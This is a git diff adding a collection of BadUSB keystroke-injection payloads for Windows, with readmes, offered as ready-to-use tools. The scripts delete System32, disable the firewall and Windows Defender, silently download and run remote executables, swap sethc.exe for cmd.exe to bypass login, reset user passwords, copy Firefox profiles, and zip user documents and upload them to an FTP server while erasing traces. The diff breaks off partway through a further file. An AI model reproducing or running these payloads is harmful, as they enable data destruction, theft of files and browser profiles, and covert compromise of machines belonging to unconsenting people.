b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/Delete32/32_wants_the_D.txt new file mode 100644 index 000000000..2d2a9d0e6 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/Delete32/32_wants_the_D.txt @@ -0,0 +1,17 @@ +REM Title:32 wants the D +REM Author: FalsePhilosopher +REM Target: Win, tested on 10 +REM Props: Hak5, my friends and memes +REM Version: 1.0 +REM Category: Prank +REM D as in DELETE! Deletes System32. +DELAY 500 +GUI r +DELAY 500 +STRING cmd +CTRL-SHIFT ENTER +DELAY 2000 +ALT y +DELAY 1500 +STRING takeown /f * /r /a /d y && icacls * /inheritance:r /grant:r administrators:(F) /t & del /f /q * +ENTER diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/Delete32/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/Delete32/readme.md new file mode 100644 index 000000000..4b5738c7b --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/Delete32/readme.md @@ -0,0 +1,46 @@ +# Original repo +https://github.com/FalsePhilosopher/badusb/tree/main/destructive/Win/Delete32 + +# 32 Wants the D + +This script deletes the system 32 folder. Be careful! + + + + +## How to use? + +This script is plug and play. I am not responsible for any damage. + + + + +## Features + +- open powershell +- delete system 32 + + + + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/DisableFirewall/DisableFirewall.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/DisableFirewall/DisableFirewall.txt new file mode 100644 index 000000000..3d971c1f3 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/DisableFirewall/DisableFirewall.txt @@ -0,0 +1,19 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Disables the Windows-Firewall. +REM Version: 1.0 +REM Category: Execution +DELAY 750 +WINDOWS d +DELAY 850 +WINDOWS r +DELAY 900 +STRING powershell Start-Process powershell -Verb runAs +ENTER +DELAY 750 +LEFTARROW +ENTER +DELAY 900 +ALT y +DELAY 900 +STRING netsh advfirewall set allprofiles state off; exit +ENTER \ No newline at end of file diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/DisableFirewall/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/DisableFirewall/readme.md new file mode 100644 index 000000000..64ac5872a --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/DisableFirewall/readme.md @@ -0,0 +1,43 @@ + +# DisableFirewall + +This script disables the windows firewall. + + + +## How to use? + +This script is plug and play. Just plug the Flipper in and run the script. + + + + +## Features + +- open powershell +- disable windows firewall + + + + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/Disable_WinDefender/Disable_WinDefender.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/Disable_WinDefender/Disable_WinDefender.txt new file mode 100644 index 000000000..2f5c0cf16 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/Disable_WinDefender/Disable_WinDefender.txt @@ -0,0 +1,41 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Disables Windows Defender. +REM Version: 1.0 +REM Category: Execution +DELAY 1500 +CTRL ESC +DELAY 750 +STRING windows security +DELAY 250 +ENTER +DELAY 1000 +ENTER +DELAY 500 +TAB +DELAY 100 +TAB +DELAY 100 +TAB +DELAY 100 +TAB +DELAY 100 +ENTER +DELAY 500 +SPACE +DELAY 1000 +ALT y +DELAY 1000 +ALT F4 +DELAY 500 +GUI r +DELAY 500 +STRING powershell +CTRL-SHIFT ENTER +DELAY 1000 +ALT y +DELAY 1000 +STRING Add-MpPreference -ExclusionPath “C:” +ENTER +DELAY 2000 +STRING EXIT +ENTER diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/Disable_WinDefender/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/Disable_WinDefender/readme.md new file mode 100644 index 000000000..98e29b9ba --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/Disable_WinDefender/readme.md @@ -0,0 +1,43 @@ + +# Disable_WinDefender + +This script disables the windows defender until the pc is restarted. + + + +## How to use? + +This script is plug and play. + + + + +## Features + +- open powershell +- disable windows defender + + + + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/DownloadAnyEXE/DownloadAnyEXE.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/DownloadAnyEXE/DownloadAnyEXE.txt new file mode 100644 index 000000000..e2c817fa2 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/DownloadAnyEXE/DownloadAnyEXE.txt @@ -0,0 +1,19 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Downloads an .exe file from the URL and runs it on the target pc. +REM Version: 1.0 +REM Category: Execution +DELAY 750 +WINDOWS d +DELAY 950 +WINDOWS r +DELAY 650 +STRING powershell Start-Process powershell -Verb runAs +ENTER +DELAY 750 +LEFTARROW +ENTER +DELAY 850 +ALT y +DELAY 1200 +STRING $url = "URL TO EXE"; $output = "C:\windows\41281687.exe"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath "C:\windows\41281687.exe"; exit +ENTER \ No newline at end of file diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/DownloadAnyEXE/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/DownloadAnyEXE/readme.md new file mode 100644 index 000000000..07b0b7c11 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/DownloadAnyEXE/readme.md @@ -0,0 +1,45 @@ + +# DownloadAnyEXE + +This script downloads an exe from an url that you will have to provide, then it executes the exe file. + + + +## How to use? + +This script is not plug and play. You will have to do the following changes: + +- change url for the .exe file "$url = "URL TO EXE"" + + + +## Features + +- open powershell +- download .exe from url +- execute downloaded .exe + + + + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/Invisible_DownExec/Invisible_DownExec.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/Invisible_DownExec/Invisible_DownExec.txt new file mode 100644 index 000000000..1eb2d3b30 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/Invisible_DownExec/Invisible_DownExec.txt @@ -0,0 +1,17 @@ +REM Author: hell0 +REM Description: Downloads an .exe file from the URL and runs it on the target pc. +REM Version: 1.0 +REM Category: Execution +REM Target: All Windows +DELAY 500 +GUI d +DELAY 500 +GUI r +DELAY 500 +STRING powershell.exe +ENTER +DELAY 2000 +STRING Start-Process -FilePath "powershell" -ArgumentList "/c cd $Env:temp;Invoke-WebRequest -Uri 'https://yoursite.com/your_executable.exe' -OutFile 'your_executable.exe'; Start-Process -FilePath '.\your_executable.exe'; exit" -WindowStyle Hidden; exit +ENTER +DELAY 500 +GUI d diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/Invisible_DownExec/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/Invisible_DownExec/readme.md new file mode 100644 index 000000000..d88a8bd60 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/Invisible_DownExec/readme.md @@ -0,0 +1,45 @@ + +# Invisible_DownExec + +This script invisibly downloads an exe from an url that you will have to provide, then it executes the exe file. + + + +## How to use? + +This script is not plug and play. You will have to do the following changes: + +- change url for the .exe file "-Uri 'https://yoursite.com/your_executable.exe'" +- change name of the .exe file "-OutFile 'your_executable.exe'" + + +## Features + +- open powershell invisble +- download .exe from url +- execute downloaded .exe + + + + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/Invisible_DownExec_Zip_Extract/Invisible_DownExec_Zip_Extract.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/Invisible_DownExec_Zip_Extract/Invisible_DownExec_Zip_Extract.txt new file mode 100644 index 000000000..f1ecb81d3 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/Invisible_DownExec_Zip_Extract/Invisible_DownExec_Zip_Extract.txt @@ -0,0 +1,17 @@ +REM Author: hell0 +REM Description: Downloads an .zip file from the URL, extract and runs it on the target pc. +REM Version: 1.0 +REM Category: Execution +REM Target: All Windows +DELAY 500 +GUI d +DELAY 500 +GUI r +DELAY 500 +STRING powershell.exe +ENTER +DELAY 2000 +STRING Start-Process -FilePath "powershell" -ArgumentList "/c cd $Env:temp;Invoke-WebRequest -Uri 'https://yoursite.com/zipfile.jpg' -OutFile 'zipfile.zip'; Expand-Archive zipfile.zip; Start-Process -FilePath '.\zipfile\your_executable.exe'; exit" -WindowStyle Hidden; exit +ENTER +DELAY 500 +GUI d diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/Invisible_DownExec_Zip_Extract/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/Invisible_DownExec_Zip_Extract/readme.md new file mode 100644 index 000000000..2d502df50 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/Invisible_DownExec_Zip_Extract/readme.md @@ -0,0 +1,47 @@ + +# Invisible_DownExec_Zip_Extract + +This script invisibly downloads an .zip file from the URL, extracts and runs it on the target pc. + + + +## How to use? + +This script is not plug and play. You will have to do the following changes: + +- change url for the .zip file "-Uri 'https://yoursite.com/zipfile.jpg'" +- change name of the .zip file "-OutFile 'zipfile.zip'" +- change path of the .exe in the extracted folder "-FilePath '.\zipfile\your_executable.exe'" + + +## Features + +- open powershell invisble +- download .zip from url +- extract .zip file +- run exe from .zip file + + + + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/OpenAnyPort/OpenAnyPort.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/OpenAnyPort/OpenAnyPort.txt new file mode 100644 index 000000000..f1558cc08 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/OpenAnyPort/OpenAnyPort.txt @@ -0,0 +1,19 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Open any TCP or UDP Port on the target PC. +REM Version: 1.0 +REM Category: Execution +DELAY 750 +WINDOWS d +DELAY 850 +WINDOWS r +DELAY 850 +STRING powershell Start-Process powershell -Verb runAs +ENTER +DELAY 800 +LEFTARROW +ENTER +DELAY 900 +ALT y +DELAY 900 +STRING netsh advfirewall firewall add rule name=Firewall entry name dir=in action=allow protocol=TCP or UDP localport=Port Number; exit +ENTER \ No newline at end of file diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/OpenAnyPort/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/OpenAnyPort/readme.md new file mode 100644 index 000000000..1e0cbcb80 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/OpenAnyPort/readme.md @@ -0,0 +1,46 @@ + +# OpenAnyPort + +This script adds a firewall rule to the Windows Advanced Firewall that allows incoming traffic over TCP or UDP on a specific port number. + + + +## How to use? + +This script is not plug and play. You will have to do the following changes: + +- choose protocol "protocol=TCP or UDP" +- change localport "localport=Port Number" +- choose entry name "name=Firewall entry name" + + +## Features + +- open powershell +- create new entry +- allow port to receive traffic + + + + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/RemoveWindowsUpdate/RemoveWindowsUpdate.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/RemoveWindowsUpdate/RemoveWindowsUpdate.txt new file mode 100644 index 000000000..04ae6ecba --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/RemoveWindowsUpdate/RemoveWindowsUpdate.txt @@ -0,0 +1,21 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Remove any Windows Update. Please put in the update number you want to remove. Example: KB27475 +REM Version: 1.0 +REM Category: Execution +DELAY 750 +WINDOWS d +DELAY 1500 +WINDOWS r +DELAY 1500 +STRING powershell Start-Process powershell -Verb runAs +ENTER +DELAY 750 +LEFTARROW +ENTER +DELAY 1500 +ALT y +DELAY 1500 +GUI UP +DELAY 1500 +STRING $input="UPDATE NUMBER";$input = $input.Replace('KB', '');$cmdString = 'wusa /quiet /norestart /uninstall /kb:' + $input;Invoke-Expression -Command $cmdString; exit +ENTER diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/RemoveWindowsUpdate/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/RemoveWindowsUpdate/readme.md new file mode 100644 index 000000000..86f8d43a5 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/RemoveWindowsUpdate/readme.md @@ -0,0 +1,44 @@ + +# RemoveWindowsUpdate + +This script uninstalls a Windows update that has been previously installed on the system. + + + +## How to use? + +This script is not plug and play. You will have to do the following changes: + +- change update number "$input="UPDATE NUMBER"" + + +## Features + +- open powershell +- find update by number +- uninstall update + + + + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/StartWifiAccessPoint/StartWifiAccessPoint.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/StartWifiAccessPoint/StartWifiAccessPoint.txt new file mode 100644 index 000000000..8aeb40fac --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/StartWifiAccessPoint/StartWifiAccessPoint.txt @@ -0,0 +1,21 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Connect to a Wifi (example Evil Twin) to sniff packets or what you wanna do. +REM Version: 1.0 +REM Category: Execution +DELAY 750 +WINDOWS d +DELAY 1500 +WINDOWS r +DELAY 1500 +STRING powershell Start-Process powershell -Verb runAs +ENTER +DELAY 750 +LEFTARROW +ENTER +DELAY 1200 +ALT y +DELAY 1200 +GUI UP +DELAY 1200 +STRING netsh wlan set hostednetwork ssid=WLAN NAME key=PASSWORD;netsh wlan start hostednetwork; exit +ENTER diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/StartWifiAccessPoint/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/StartWifiAccessPoint/readme.md new file mode 100644 index 000000000..58b39bcb0 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/StartWifiAccessPoint/readme.md @@ -0,0 +1,44 @@ + +# StartWifiAccessPoint + +This script sets up a hosted wireless network on a computer running Windows. + + +## How to use? + +This script is not plug and play. You will have to do the following changes: + +- choose name of wifi "ssid=WLAN NAME" +- choose password of the wifi "key=PASSWORD" + + +## Features + +- open powershell +- create new wifi by ssid +- set password for wifi + + + + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/StickyKeysSWAP/StickyKeysSWAP.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/StickyKeysSWAP/StickyKeysSWAP.txt new file mode 100644 index 000000000..2f059df90 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/StickyKeysSWAP/StickyKeysSWAP.txt @@ -0,0 +1,21 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Switch cmd.exe with sethc.exe, allowing to get access to target pc without knowing the pin. +REM Version: 1.0 +REM Category: Execution +DELAY 750 +WINDOWS d +DELAY 1500 +WINDOWS r +DELAY 1500 +STRING powershell Start-Process powershell -Verb runAs +ENTER +DELAY 750 +LEFTARROW +ENTER +DELAY 1500 +ALT y +DELAY 1500 +GUI UP +DELAY 1500 +STRING copy c:\windows\system32\sethc.exe c:\;$acl = Get-Acl c:\windows\system32\sethc.exe;$AccessRule1 = New-Object System.Security.AccessControl.FileSystemAccessRule("Jeder","FullControl","Allow");$AccessRule2 = New-Object System.Security.AccessControl.FileSystemAccessRule("Everyone","FullControl","Allow");$acl.SetAccessRule($AccessRule1);$acl | Set-Acl c:\windows\system32\sethc.exe;$acl.SetAccessRule($AccessRule2);$acl | Set-Acl c:\windows\system32\sethc.exe;Copy-Item -Path c:\windows\system32\cmd.exe -Destination c:\windows\system32\sethc.exe -Recurse -force; exit +ENTER diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/StickyKeysSWAP/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/StickyKeysSWAP/readme.md new file mode 100644 index 000000000..f75299161 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/StickyKeysSWAP/readme.md @@ -0,0 +1,37 @@ + +# StickyKeysSWAP + +This script modifies the system file "sethc.exe" on a computer running Windows by adding full control access rules for "Everyone", replacing the file with the "cmd.exe" file, and setting the access control list of the file to the modified access control list. + +## How to use? + +This script is plug and play. Just plug in the Flipper and run the script. + + +## Features + +- open powershell +- replace cmd.exe + + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/setWinPass/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/setWinPass/readme.md new file mode 100644 index 000000000..e197445aa --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/setWinPass/readme.md @@ -0,0 +1,43 @@ + +# setWinPass + +This script sets the password for the current user on windows. + + +## How to use? + +This script is not plug and play. You will have to do the following changes: + +- change password to anything you like "$NewPassword = ConvertTo-SecureString "PASSWORD HERE"" + + +## Features + +- open powershell +- find current username +- set new password for current user + + + + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/setWinPass/setWinPass.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/setWinPass/setWinPass.txt new file mode 100644 index 000000000..a024c32c5 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Execution/setWinPass/setWinPass.txt @@ -0,0 +1,30 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Change Widnows 10 user password. +REM Version: 1.0 +REM Category: Execution +DELAY 750 +WINDOWS d +DELAY 1500 +WINDOWS r +DELAY 1500 +STRING powershell Start-Process powershell -Verb runAs +ENTER +DELAY 560 +LEFTARROW +DELAY 500 +ENTER +DELAY 560 +STRING $User = ([Environment]::UserName) +DELAY 200 +ENTER +DELAY 500 +STRING $NewPassword = ConvertTo-SecureString "PASSWORD HERE" -AsPlainText -Force +DELAY 300 +ENTER +DELAY 500 +STRING Set-LocalUser -Name $User -Password $NewPassword +DELAY 300 +ENTER +DELAY 600 +STRING exit +ENTER diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/Document_Exfil/Exfiltrate_Documents.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/Document_Exfil/Exfiltrate_Documents.txt new file mode 100644 index 000000000..7e68126a1 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/Document_Exfil/Exfiltrate_Documents.txt @@ -0,0 +1,114 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Exfiltrate documents and upload them to a ftp server. +REM Version: 1.0 +REM Category: Exfiltration +DELAY 800 +GUI r +DELAY 1000 +STRING powershell Start-Process notepad -Verb runAs +ENTER +DELAY 800 +ALT y +DELAY 800 +ENTER +ALT SPACE +DELAY 1000 +STRING m +DELAY 1000 +DOWNARROW +REPEAT 100 +ENTER +STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss') +ENTER +STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime +ENTER +STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory +ENTER +STRING $date = get-date +ENTER +STRING $style = "" +ENTER +STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html' +ENTER +STRING $Report = $Report + "

Duck Tool Kit Report



Generated on: $Date


" +ENTER +STRING $Report = $Report + '

User Documents (doc,docx,pdf,rar)

' +ENTER +STRING $Report = $Report + (Get-ChildItem -Path $userDir -Include *.doc, *.docx, *.pdf, *.zip, *.rar -Recurse |convertto-html Directory, Name, LastAccessTime) +ENTER +STRING $Report = $Report + '
' +ENTER +STRING $Report >> $fileSaveDir'/ComputerInfo.html' +ENTER +STRING function copy-ToZip($fileSaveDir){ +ENTER +STRING $srcdir = $fileSaveDir +ENTER +STRING $zipFile = 'C:\Windows\Report.zip' +ENTER +STRING if(-not (test-path($zipFile))) { +ENTER +STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18)) +ENTER +STRING (dir $zipFile).IsReadOnly = $false} +ENTER +STRING $shellApplication = new-object -com shell.application +ENTER +STRING $zipPackage = $shellApplication.NameSpace($zipFile) +ENTER +STRING $files = Get-ChildItem -Path $srcdir +ENTER +STRING foreach($file in $files) { +ENTER +STRING $zipPackage.CopyHere($file.FullName) +ENTER +STRING while($zipPackage.Items().Item($file.name) -eq $null){ +ENTER +STRING Start-sleep -seconds 1 }}} +ENTER +STRING copy-ToZip($fileSaveDir) +ENTER +STRING $final = 'C:\Windows\Report.zip' +ENTER +STRING $ftpAddr = "ftp://username:password@ftp.host.com/Report.zip" +ENTER +STRING $browser = New-Object System.Net.WebClient +ENTER +STRING $url = New-Object System.Uri($ftpAddr) +ENTER +STRING $browser.UploadFile($url, $final) +ENTER +STRING remove-item $fileSaveDir -recurse +ENTER +STRING remove-item 'C:\Windows\Report.zip' +ENTER +STRING Remove-Item $MyINvocation.InvocationName +ENTER +CTRL s +DELAY 800 +STRING C:\Windows\config-58477.ps1 +ENTER +DELAY 1000 +ALT F4 +DELAY 800 +GUI r +DELAY 800 +STRING powershell Start-Process cmd -Verb runAs +ENTER +DELAY 800 +ALT y +DELAY 1000 +STRING mode con:cols=14 lines=1 +ENTER +ALT SPACE +DELAY 800 +STRING m +DELAY 1000 +DOWNARROW +REPEAT 100 +ENTER +STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false +ENTER +DELAY 800 +STRING powershell.exe -windowstyle hidden -File C:\Windows\config-58477.ps1 +ENTER diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/Document_Exfil/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/Document_Exfil/readme.md new file mode 100644 index 000000000..4818ae232 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/Document_Exfil/readme.md @@ -0,0 +1,39 @@ + +# Exfiltrate Documents +This script will exfiltrate documents stored on the pc and upload them to a ftp server. + +## How to use? + +This script is not plug and play. You need to do the following changes: + +- change the ftp server info right here "STRING $ftpAddr = "ftp://username:password@ftp.host.com/Report.zip" + + +## Features + +- open powershell +- exfiltrate documents +- upload documents to ftp server + + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/ExfilFirefox/ExfilFirefox.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/ExfilFirefox/ExfilFirefox.txt new file mode 100644 index 000000000..a96781a0a --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/ExfilFirefox/ExfilFirefox.txt @@ -0,0 +1,21 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Exfiltrate Firefox profile and store to path. Change destination Path at the very end of the string. +REM Version: 1.0 +REM Category: Exfiltration +DELAY 750 +WINDOWS d +DELAY 1500 +WINDOWS r +DELAY 1500 +STRING powershell Start-Process powershell -Verb runAs +ENTER +DELAY 750 +LEFTARROW +ENTER +DELAY 1200 +ALT y +DELAY 1200 +GUI UP +DELAY 1200 +STRING $ErrorActionPreference = "SilentlyContinue";$folderDateTime = (get-date).ToString('d-M-y HHmmss');$userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost Report ' + $folderDateTime;$fileSaveDir = New-Item ($userDir) -ItemType Directory;$date = get-date;$style = "";$Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo-26528702.html';$Report = $Report + "

Walkuer Ghost Report



Generated on: $Date


";$fireSaveDir = New-Item $userDir'\WGD\FireFox-Profile' -ItemType Directory;$fireDir = (Get-ChildItem env:userprofile).value + '\AppData\Roaming\Mozilla\Firefox\Profiles';Copy-Item $fireDir -Destination $fireSaveDir -Recurse;Start-Sleep -s 10;$Report >> $fileSaveDir'/ComputerInfo-26528702.html';Compress-Archive -Path $fileSaveDir -DestinationPath PATH\results-26528702.zip ; exit +ENTER diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/ExfilFirefox/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/ExfilFirefox/readme.md new file mode 100644 index 000000000..36886bbdd --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/ExfilFirefox/readme.md @@ -0,0 +1,39 @@ + +# ExfilFirefox +This script exfiltrates the firefox profile and saves them to a local html file. + +## How to use? + +This script is not plug and play. You need to do the following changes: + +- change path of the file "-DestinationPath PATH\results-26528702.zip" + + +## Features + +- open powershell +- copy firefox profile +- paste profile into a html file + + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/General_PC_Information/General_PC_Information.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/General_PC_Information/General_PC_Information.txt new file mode 100644 index 000000000..16f9259fe --- /dev/null +++ 